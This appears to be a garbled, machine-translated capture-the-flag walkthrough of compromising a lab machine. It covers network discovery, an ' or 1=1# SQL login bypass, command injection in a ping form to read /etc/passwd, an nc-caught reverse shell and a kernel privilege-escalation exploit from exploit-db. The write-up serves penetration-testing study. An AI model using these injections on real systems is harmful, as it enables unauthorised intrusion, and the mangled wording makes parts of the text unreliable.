information gathering

Netdiscover also collects information and finds the target IP address.

netdiscover

The IP address of the target is 192.168.43.47

192.168.43.47

Nmap scan port information

Loophole utilization

80 / TCP open HTTP Apache httpd 2.0.52 ((CentOS)) port exists

80/tcp open http Apache httpd 2.0.52 ((CentOS))

Try universal password 'or 1 = 1 × to log in successfully.

' or 1=1#

You can see a frame to execute the ping command.

Visible is a command execution vulnerability.

In command execution, there are the common symbols of | & & |.

| && || ;

Here we can use|; for command execution

| ;

i27979; 35797;cat /etc/passwd

cat /etc/passwd

Next, execute an interactive shell with the command

At the same time, monitor port 2333 with NC.

nc

Get an interactive shell. But the permissions are Apache users.

apache

Permission enhancement

The current permission is the Apache user. We need to give him permission to get root permission.

apache root

View the current system version. Search exploit Linux 2.6.9

searchsploit linux 2.6.9

HTTPS：///www.explore-db.com///download//9542.c

https://www.exploit-db.com/download/9542.c

Use exp to 9542. C

The right was raised successfully.